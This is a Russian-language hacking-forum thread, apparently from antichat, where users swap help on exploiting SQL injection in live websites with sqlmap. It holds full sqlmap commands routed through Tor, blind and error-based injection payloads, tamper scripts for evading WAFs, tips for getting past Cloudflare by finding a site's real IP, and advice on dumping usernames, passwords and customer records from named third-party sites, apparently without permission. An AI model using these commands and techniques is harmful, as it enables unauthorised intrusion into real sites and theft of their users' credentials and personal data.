[13:05:25] [INFO]retrieved:
[13:05:25] [ERROR]unable to retrieve the number of databases
[13:05:25] [INFO]falling back to current database
[13:05:25] [INFO]fetching current database
[13:05:28] [INFO]retrieved:
[13:05:30] [INFO]retrieved:
[13:05:30] [CRITICAL]unable to retrieve the database names
[13:05:30] [INFO]fetched data logged to text files under'outp ut\site.org'
ending@13:05:30/2019-09-14/
Попробовал с --dbms=MySQL:
[PHP]
PHP:
[COLOR="#0000BB"]sqlmap.py-u"http://site.org/rent.php?country=179&method=get_mobile
_count&operator=4&services=33*&timereset=2"--random-agent--tor--tor-type=SOCKS5--risk=3--level=5--hex--time-sec=15--dbms=MySQL--dbs
___
__H__
___ ___[.]_____ ___ ___{1.3.9.9#dev}
|_-| . [[COLOR="#DD0000"]"] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for atta cking targets without prior mutual consent i s illegal. It is the end user's responsibil ity to
obey all applicable local, state and federal laws. Developers assume no liability and a re not responsible for any misuse or damage caused by
this program
starting @ 15:27:55 /2019-09-14/
[15:27:55] [INFO] setting Tor SOCKS proxy settings
[15:27:56] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) Appl eWebKit/534.24 (KHTML, lik
e Gecko) Chrome/11.0.696.68 Safari/534.24' from file 'user-agents.txt'
custom injection marker ('*') found in optio n '-u'. Do you want to process it? [Y/n/q] y
[15:27:59] [INFO] testing connection to the target URL
sqlmap resumed the following injection point( s) from stored session:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND 6284=6284&timereset=2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://site.org:80/rent.php?country=179&method=get_mobile_count&operator=4&services=33 AND (SELECT 5287 FROM (SELECT(SLE EP(
15)))FhgH)&timereset=2
---
[15:28:00] [INFO] testing MySQL
[15:28:00] [INFO] confirming MySQL
[15:28:03] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0.2 (MariaDB fork)
[15:28:03] [WARNING] information_schema not available, back-end DBMS is MySQL
karkajoi
19.09.2019, 16:12
ex3x1 said:
↑ (https://antichat.live/posts/4332921/)
И снова здравствуйте. Сайт под CloudFlare, с включенной для всех стран гугл каптчей при входе на него. Скульмап не может пройти через капчу, постоянно еррорит:
Code:
[WARNING] potential CAPTCHA protection mechanism detected (CloudFlare)
[WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
Пробовал подставлять куки с параметром --cookie и ни какого эффекта, так же 403. Тампер "luanginx" бесполезен в этом случае тоже. Есть идеи как пробиться сквозь капчу?
1) крутить руками
2) искать реальный IP сайта
З.Ы если там правильно настроен клауд, то скулю будет сложно раскрутить, паблик методов обхода клауда при sqli я не видел (только старые методы которые уже не катят)
karkajoi
19.09.2019, 16:18
ex3x1 said:
↑ (https://antichat.live/posts/4332968/)
WAF отключен у них полностью.
Ну тогда 1е 2 варианта. Если скуля не слепая, то руками крутануть
P.S Мапа в последнее время херово видит скули почему-то. Приходится все чаще делать все в ручном режиме, либо искать другой софт
заранее сори за глупый вопрос, вот так бывает... )
есть несколько значений id = 2421,12412,41241,4121 которые мне нужны
как с командой --where извлечь только эти ID ?
думал --where=id=2421,12412,41241,4121
вероятно не запятая между значениями нужна ))
joelblack
20.09.2019, 16:59
Estet said:
↑ (https://antichat.live/posts/4333141/)
заранее сори за глупый вопрос, вот так бывает... )
есть несколько значений id = 2421,12412,41241,4121 которые мне нужны
как с командой --where извлечь только эти ID ?
думал --where=id=2421,12412,41241,4121
вероятно не запятая между значениями нужна ))
Code:
--where "id IN (1,3)"
pacojaveh
25.09.2019, 11:27
ex3x1 said:
↑ (https://antichat.live/posts/4332921/)
И снова здравствуйте. Сайт под CloudFlare, с включенной для всех стран гугл каптчей при входе на него. Скульмап не может пройти через капчу, постоянно еррорит:
Code:
[WARNING] potential CAPTCHA protection mechanism detected (CloudFlare)
[WARNING] the web server responded with an HTTP error code (403) which could interfere with the results of the tests
Пробовал подставлять куки с параметром --cookie и ни какого эффекта, так же 403. Тампер "luanginx" бесполезен в этом случае тоже. Есть идеи как пробиться сквозь капчу?
Попробуй
https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/
Imperou$
26.09.2019, 20:39
ex3x1
Так же чекни
http://crimeflare.org:82/cfs.html
и
https://viewdns.info/iphistory/
на реал ip. Потом просто обращайся к сайту по ip, с указанием заголовка Host: yourtarget.com
sosidzh24
27.09.2019, 19:44
сканер определил уязвимую ссылку и базу данных, имеет вид plants/?sFilterProperties=1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHA R(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(10 5),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97 )))),1)-- 1&sPage=1&sPerPage=12 (http://www.lubera.co.uk/plants/mediterranean-plants/?sFilterProperties=1%20procedure%20analyse(extract value(rand()%2cconcat(0x3a%2cCONCAT(CHAR(95)%2cCHA R(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105 )%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)% 2cCHAR(97))))%2c1)--%201&sPage=1&sPerPage=12) Но sqlmap отказывается брать этот сайт.Какую технику использовать чтобы направить его в нужное направление?
NewbieOnHack
28.09.2019, 16:42
Всем привет форумчане, кто может обьяснить, что делает --no-cast? Заранее спасибо. И почему при нормализации в --hex не дает базу и сыпятся запросы(блочит ваф), а при --no-cast я спокойно получил базу и дамплю сейчас!)
NewbieOnHack said:
↑ (https://antichat.live/posts/4334854/)
Всем привет форумчане, кто может обьяснить, что делает --no-cast? Заранее спасибо. И почему при нормализации в --hex не дает базу и сыпятся запросы(блочит ваф), а при --no-cast я спокойно получил базу и дамплю сейчас!)
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Turn off payload casting mechanism
Switch: --no-cast
When retrieving results, sqlmap uses a mechanism where all entries are being casted to string type and replaced with a whitespace character in case of NULL values. That is being made to prevent any erroneous states (e.g. concatenation of NULL values with string values) and to easy the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned-off (using this switch) because of problems with data retrieval itself (e.g. None values are returned back).
NewbieOnHack
30.09.2019, 17:57
RWD said:
↑ (https://antichat.live/posts/4334922/)
https://github.com/sqlmapproject/sqlmap/wiki/Usage
Turn off payload casting mechanism
Switch: --no-cast
When retrieving results, sqlmap uses a mechanism where all entries are being casted to string type and replaced with a whitespace character in case of NULL values. That is being made to prevent any erroneous states (e.g. concatenation of NULL values with string values) and to easy the data retrieval process itself. Nevertheless, there are reported cases (e.g. older versions of MySQL DBMS) where this mechanism needed to be turned-off (using this switch) because of problems with data retrieval itself (e.g. None values are returned back).
Спасибо, но я не понял почему я обошел фильтр этим методом(при sql запросе в url строку получал 504, что означало, что коннект дропает фильтр)
hello everyone, I'm sorry for not being able to speak Russian. I can translate if necessary but I thought I'd try it in english first.
I got a site which is vulnerable to SQL injection, however whatever I try it doesn't exploit the vulnerability. Also the WAF blocks some payloads, so I used Atlas(https://github.com/m4ll0k/Atlas) to identify the WAF, but it didn't manage to identify it, however it suggested me some tampers to use before the WAF blocked my IP. This is the response I get when I manually type in ' behind this site:
https://www.site.xx/xxxx/product.php?id=47 (https://www.site.xxl/xxxx/product.php?id=47)' (I enter the ' myself)
"MySQL error: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\' AND p.products_status = 1 GROUP BY p.products_id' at line 1
SELECT * FROM products AS p LEFT JOIN products_description AS pd ON p.products_id=pd.products_id WHERE p.products_id = 47\\\' AND p.products_status = 1 GROUP BY p.products_id
TEP_DB_ERROR"
command used:
sqlmap -u https://www.site.xx/xxxx/product.php?id=47 --random-agent --level=5 --risk=3 --dbs --tamper=htmlencode,charunicodeencode,modsecurityver sioned,modsecurityzeroversioned,multiplespaces
Anyone knows how I could exploit?
sosidzh24
04.10.2019, 04:39
man474019 said:
↑ (https://antichat.live/posts/4334771/)
and what you used ?
--level 5 --risk 3 -v 3 --random-agent
sosidzh24
04.10.2019, 16:33
man474019 said:
↑ (https://antichat.live/posts/4336335/)
what sqlmap's result ?
all tested parameters do not appear to be injectable. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
There are no errors in payloads
Как правильно построить запрос к базе данных через sqlmap, если мне нужна только одна запись?
Запрос типа
-T phpbb_users -C username,user_password --tamper=between --dump
Дампит все 100500 строк, но мне нужна одно значения логина-пароля, предположим, из 666 записи и не больше.
Как её правильно построить?
karkajoi
06.10.2019, 11:45
Muracha said:
↑ (https://antichat.live/posts/4336718/)
Как правильно построить запрос к базе данных через sqlmap, если мне нужна только одна запись?
Запрос типа
Дампит все 100500 строк, но мне нужна одно значения логина-пароля, предположим, из 666 записи и не больше.
Как её правильно построить?
--start=666 --stop=667 ну или через --where="email='asd@gmail.com (mailto:asd@gmail.com)'", --where="id IN (1,3)",что то типо такого
Imperou$
08.10.2019, 19:09
Я вас категорически приветствую. Вопрос, есть ли возможность настроить мап для автоматического дампа с конца базы, а не с начала. Типа start=1000 stop=1. Приходится дампить построчно, например 900-1000, 800-900, 700-800 etc, что не очень удобно. Возможно где то в settings.py либо скриптах подправить,либо какая то надстройка существует или костылями проставить какие то специфические параметры выборки в where по id при сливе, чтобы считывались данные с конца таблицы, при дампе по порядку мапом.. Подскажите, если кто озадачивался таким вопросом, периодически возникает данная необходимость...
Sentureg
11.10.2019, 21:15
Привет, может кто подскажет bypass к aws waf (Amazon)
Или как можно обойти эту защиту?
Baskin-Robbins
11.10.2019, 21:32
Sentureg said:
↑ (https://antichat.live/posts/4337802/)
Привет, может кто подскажет bypass к aws waf (Amazon)
Или как можно обойти эту защиту?
/threads/469197/#post-4288885 (https://antichat.live/threads/469197/)
Доброго времени суток. Получил такой результат со сканера:
This vulnerability affects /kontaktannonser/lista/ (https://antichat.live/file_/C_/ProgramData/Acunetix_20WVS_2010/Data/Reporter/ReportItemTemp.xml/).
HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/GET
/kontaktannonser/lista/ HTTP/1.1
Referer: if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Как правильно составить запрос для Sqlmap?
winstrool
27.10.2019, 16:11
ex3x1 said:
↑ (https://antichat.live/posts/4341461/)
Acunetix нашел 2 скули: Blind SQL Injection и SQL injection в двух разных скриптах. Сайт на движке WordPress. При попытке раскрутить через скульмап постоянно получаю ошибку: 406 (Not acceptable), скульмап определяет WAF - ModSecurity TrustWave. Пробовал различные комбинации тамперов - постоянно та же самая ошибка 406. Если вдруг у кого то есть время - прошу помощи, в ЛС скину всю инфу.
тут надо самому сначала разбираться на что ваф срабатывает, а потом тампер писать, что в самом скульмапе, там типичные тамперы
kacergei
01.11.2019, 20:04
Ребят кто как борится с got HTTP error code: 424 (HTTPError: Failed Dependency) ?
В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
Что можно сделать?
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3
[21:11:39] [INFO] retrieved:
[21:11:39] [DEBUG] performed 3 queries in 1.12 seconds
[21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:51] [INFO] retrieved:
[21:11:51] [DEBUG] performed 3 queries in 11.51 seconds
[21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'
[21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'
ending @ 21:11:51 /2019-11-02/
karkajoi
03.11.2019, 23:10
Estet said:
↑ (https://antichat.live/posts/4342935/)
В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
Что можно сделать?
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3
[21:11:39] [INFO] retrieved:
[21:11:39] [DEBUG] performed 3 queries in 1.12 seconds
[21:11:39] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[21:11:39] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>51) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:39] [WARNING] time-based comparison requires larger statistical model, please wait........................... (done)
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>48) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:50] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[21:11:50] [PAYLOAD] (SELECT (CASE WHEN (UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(*))) AS NVARCHAR(4000)),CHAR(32)) FROM SB.dbo.sb_customersTB WHERE Customer Group IS NOT NULL),1,1))>9) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE 1083 END))
[21:11:51] [INFO] retrieved:
[21:11:51] [DEBUG] performed 3 queries in 11.51 seconds
[21:11:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:11:51] [WARNING] unable to retrieve the number of column(s) '[Customer Group]' entries for table 'sb_customersTB' in database 'SB'
[21:11:51] [INFO] fetched data logged to text files under '/root/.sqlmap/output/stickersbanners.com'
ending @ 21:11:51 /2019-11-02/
943 пост в этой тебе (предыдущая страница)
karkajoi said:
↑ (https://antichat.live/posts/4343200/)
943 пост в этой тебе (предыдущая страница)
Так в том то и дело, что когда используешь where, перестает извлекать. Без where, все подряд без проблем извлекается
еще такой вопрос, можно ли как то извлечь данные, по критерию: длинна содержимого колонки.
Допустим мне нужны все строки, где длинна определенной колонки не 7 символов?
Estet said:
↑ (https://antichat.live/posts/4342935/)
В чем может быть проблема, все норм извлекается, есть пустые значения, есть с записями.
Когда пытаюсь с командой "--where" отказывается извлекать. Пробовал другие значения
Что можно сделать?
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "Customer Group IS NOT NULL" --dump --threads=10 -v 3
А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки:
Code:
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
Oops - It seems the page you are looking for is not here
CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''DLAj29'' order by t.id desc limit 9' at line 4
не крутится( какой темпер можно заюзать?
Yii Framework/PDO
Baskin-Robbins said:
↑ (https://antichat.live/posts/4331496/)
--where=email LIKE '%@site.com'
но не уверен, сейчас проверил на sqlmap - не хочет работать, хотя вручную все работает
вдруг кому будет полезно.
тут DBMS is Microsoft SQL Server это сработало.
karkajoi
05.11.2019, 16:09
fandor9 said:
↑ (https://antichat.live/posts/4343363/)
А вы уверены что колонка у вас называется "Customer Group", а не "Customer_Group"? Если точно с пробелом, то попробуйте поставить имя колонки в одинарные кавычки:
Code:
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C "Customer Group" --where "'Customer Group' IS NOT NULL" --dump --threads=10 -v 3
Попадались мне тоже пробелы в MSSQL( Правда было в имени БД) помогло добавление вместо пробела %20, и мапа начала крутить без проблем. По идее должно для всего работать.
Code:
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C Customer%20Group --where="'Customer%20Group' IS NOT NULL" --dump --threads=10 -v 3
так по пробуй.
karkajoi said:
↑ (https://antichat.live/posts/4343510/)
Попадались мне тоже пробелы в MSSQL( Правда было в имени БД) помогло добавление вместо пробела %20, и мапа начала крутить без проблем. По идее должно для всего работать.
Code:
./sqlmap.py -r /root/req.txt --level 5 --risk 3 --dbs --current-db -p tt --dbms=mssql -D SB -T dbo.sb_customersTB -C Customer%20Group --where="'Customer%20Group' IS NOT NULL" --dump --threads=10 -v 3
так по пробуй.
уж не знаю, в чем там дело.
--where="Customer%20Group=General" - не работает (в любых комбинациях, и да General значения там есть)
--where="Email LIKE '%@site.com'" - прекрасно работает
xCharley88x
06.11.2019, 17:26
Доброго времени суток
есть проблемма с выводом из базы
+-------------------+-------------+
| Column | Type |
+-------------------+-------------+
| aPass | blob |
--hex и --no-cast не подходят,меняется вывод но проблемма не решается
--binary-fields тоже
пассы судя по всему в открытом виде не хэш
есть тут кто может помочь?
за помощ отблагодарю!
winstrool
06.11.2019, 20:32
пробуйте с начало руками, смотрите в чем проблема, может своими запросами получится через --sql-shell, думаю что какой-то косяк с кодировкой что бьет вывод
blob выводится через --hex так в чем проблема то?
xCharley88x said:
↑ (https://antichat.live/posts/4343727/)
меняется вывод но проблемма не решается
Народ, кто встречал такое:
Извлекаю уже на третьем сайте, подобную хрень:
?t?1f?????F/???|????6(?\\R?jGa??,b?`???????
Соль такого формата
-121880803
либо положительное значение.
Пробовал закинуть свой пас и извлечь хэш, получил тоже самое.
закинул в базу пароль: 123qwe
получил его хэш: ?;\n?p????x=A?F??)9???hR??Pr????q??
Кто встречал подобное? Грешил на язык, но вроде и сайты англоязычные и это же хэш) они бывают на других языках? ) Сори не так давно работаю с хэш функциями, не во всем разб
Сканер нашел уязвимость,но я с таким столкнулся впервые
Code:
-u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22forename%22
Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22surname%22
Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22email%22
netsparker@example.com
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22new_pass%22
N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22retype_pass%22
N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22county_id%22
test
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22town_id%22
893
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22phone%22
3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22mobile%22
3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22terms_conditions%22
on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22subscribe_emails%22
on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22g-recaptcha-response%22
10000000146
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22submit%22
Create Account
--31ed9d031d5848e3a524ba24f417a44b--
" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL"
Пробую через sqlmap - получаю такую ошибку:
[CRITICAL] all testable parameters you provided are not present within the given request data
Как правильно скормить в sqlmap?
winstrool
09.11.2019, 10:58
vladF said:
↑ (https://antichat.live/posts/4344426/)
Сканер нашел уязвимость,но я с таким столкнулся впервые
Code:
-u "https://site.com/user_save.php" -p "county_id" --risk="3" --method="POST" --data="--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22forename%22
Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22surname%22
Smith
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22email%22
netsparker@example.com
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22new_pass%22
N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22retype_pass%22
N3tsp@rker-
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22county_id%22
test
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22town_id%22
893
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22phone%22
3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22mobile%22
3
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22terms_conditions%22
on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22subscribe_emails%22
on
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22g-recaptcha-response%22
10000000146
--31ed9d031d5848e3a524ba24f417a44b
Content-Disposition: form-data; name=%22submit%22
Create Account
--31ed9d031d5848e3a524ba24f417a44b--
" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" --cookie="PHPSESSID=vorccgbo8prl78srfaqavg0map" --headers="Host:www.site.com\nCache-Control:no-cache\nReferer:https://site.com/user_save.php\nAccept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\nAccept-Language:en-us,en;q=0.5\nX-Scanner:Netsparker\nAccept-Encoding:gzip, deflate\nContent-Type:multipart/form-data; boundary=31ed9d031d5848e3a524ba24f417a44b" --dbms="MySQL"
Пробую через sqlmap - получаю такую ошибку:
[CRITICAL] all testable parameters you provided are not present within the given request data
Как правильно скормить в sqlmap?
Правильно сложите весь пакет запроса в файл и подключите его через параметр: sqlmap.py -r file.txt
winstrool said:
↑ (https://antichat.live/posts/4344444/)
Правильно сложите весь пакет запроса в файл и подключите его через параметр:
sqlmap.py -r file.txt
Такая же ошибка вылетает.. Подскажите, как "Правильно сложить весь пакет"? Может я что-то не так делаю..
winstrool
09.11.2019, 13:22
vladF said:
↑ (https://antichat.live/posts/4344452/)
Такая же ошибка вылетает.. Подскажите, как "Правильно сложить весь пакет"? Может я что-то не так делаю..
зайти на этот урл, и сделай то действие чтоб перехватить запрос, так полагаю это сохранение по название скрипта, перехватываешь тело запроса и кладешь в файлик, а дальше этот файлик скармливаешь скульмапу, если известен уязвимый параметр, то помечаешь его * чтоб скульмап зря не тратил время на другие параметры и сразу обратился к нему.
Estet said:
↑ (https://antichat.live/posts/4343866/)
Народ, кто встречал такое:
Извлекаю уже на третьем сайте, подобную хрень:
?t?1f?????F/???|????6(?\\R?jGa??,b?`???????
Соль такого формата
-121880803
либо положительное значение.
Пробовал закинуть свой пас и извлечь хэш, получил тоже самое.
закинул в базу пароль: 123qwe
получил его хэш: ?;\n?p????x=A?F??)9???hR??Pr????q??
Кто встречал подобное? Грешил на язык, но вроде и сайты англоязычные и это же хэш) они бывают на других языках? ) Сори не так давно работаю с хэш функциями, не во всем разб
честно говоря, сам не встречался с таким, но судя по выводу похоже что мап выдаёт вам сразу бинарные данные (байты), а ваша консоль конвертирует их сразу в ASCII. И тогда вы получаете вот такую вот хрень. Можете попробовать прогнать мап через локальный веб-прокси (Burp и прочее) и посмотреть что там вам выдаёт мап.
jakonda1001
14.11.2019, 02:30
блин не пойму как сдампить только мыльники и пароли (не проверяя в какой они таблице, если есть) (просто пример любой на вскидку, дальше по аналогии пойму)
Server:
web server operating system: Windows 10 or 2016
web application technology: ASP.NET, Microsoft IIS 10.0, ASP
back-end DBMS: active fingerprint: Microsoft SQL Server 2017
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
sqlmap udalos vitashits DB list(55 Dbs) - no kogda delaesh -D db --tables, srazu pokazivaet redirekt na orginal sait www.sait.com (http://www.sait.com) - i ne daet vitashits tablici, sto delats?
databases udalos vitashits tolka s --no-cast
"sqlmap got a 302 redirect to 'http://www.sait.com'. Do you want to follow? [Y/n]"
kogda vitaskival DB ne prosilo takoe, i vse skachalos norm
[12:46:13] [INFO] fetching tables for database: ev
[12:46:13] [INFO] heuristics detected web page charset 'ascii'
[12:46:13] [WARNING] the SQL query provided does not return any output
[12:46:13] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[12:46:14] [WARNING] the SQL query provided does not return any output
[12:46:14] [CRITICAL] unable to retrieve the tables for any database
[12:46:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
Goore said:
↑ (https://antichat.live/posts/4345494/)
[12:46:13] [INFO] fetching tables for database: ev
[12:46:13] [INFO] heuristics detected web page charset 'ascii'
[12:46:13] [WARNING] the SQL query provided does not return any output
[12:46:13] [WARNING] it was not possible to count the number of entries for the SQL query provided. sqlmap will assume that it returns only one entry
[12:46:14] [WARNING] the SQL query provided does not return any output
[12:46:14] [CRITICAL] unable to retrieve the tables for any database
[12:46:14] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
да
WallHack
21.11.2019, 16:27
Sqlmap перестал работать, не видит ключи
sqlmap.py -hh
sqlmap.py --update
В любом случае
Code:
Usage: sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --
list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic a
nd -hh for advanced help
Press Enter to continue...
Что отвалилось ?
проще заново скачать в другую папку и запустить
WallHack said:
↑ (https://antichat.live/posts/4346911/)
Sqlmap перестал работать, не видит ключи
sqlmap.py -hh
sqlmap.py --update
В любом случае
Code:
Usage: sqlmap.py [options]
sqlmap.py: error: missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --
list-tampers, --wizard, --update, --purge or --dependencies). Use -h for basic a
nd -hh for advanced help
Press Enter to continue...
Что отвалилось ?
бывает ломается python, как вариант переустановить оба.
Всем привет.
